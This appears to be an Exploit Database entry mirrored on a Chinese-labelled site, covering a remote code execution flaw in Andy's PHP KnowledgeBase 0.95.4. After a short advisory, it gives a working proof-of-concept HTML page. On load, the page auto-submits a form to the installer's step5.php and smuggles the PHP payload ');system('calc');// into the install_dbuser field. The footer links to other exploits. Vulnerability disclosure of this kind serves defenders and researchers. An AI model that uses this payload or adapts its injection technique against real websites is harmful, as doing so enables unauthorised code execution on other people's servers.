Andy’s PHP KnowledgeBase 0.95.4 – ‘step5.php’ PHP Remote Code Execution

Exploit Database
14 阅读

作者： AutoSec Tools

日期： 2011-05-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/35783/

source: https://www.securityfocus.com/bid/47918/info

Andy's PHP Knowledgebase is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.

Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.

Andy's PHP Knowledgebase 0.95.4 is vulnerable; other versions may also be affected. 

<html>
<body onload="document.forms[0].submit()"> 
<form method="POST" action="http://localhost/aphpkb/install/step5.php">
<input type="hidden" name="install_dbuser" value="');system('calc');//" /> 
<input type="submit" name="submit" /> 
</form> 
</body>
</html>

last Exploits
Andy’s PHP KnowledgeBase 0.95.4 – ‘step5.php’ PHP Remote Code Execution的更多信息

PHP-Fusion – Remote Command Execution：
GAzie 5.10 – ‘Login’ Multiple Vulnerabilities：
Joomla! Component CW Article Attachments 1.0.6 – ‘id’ SQL Injection：
Simple CRM 3.0 – ‘name’ Stored Cross site scripting (XSS)：
DrayTek VigorACS SI 1.3.0 – Multiple Vulnerabilities：
Joomla! Component Magic Updater – Local File Inclusion：
Shopware 5.2.5/5.3 – Cross-Site Scripting：
WordPress Plugin Pixarbay Images 2.3 – Multiple Vulnerabilities：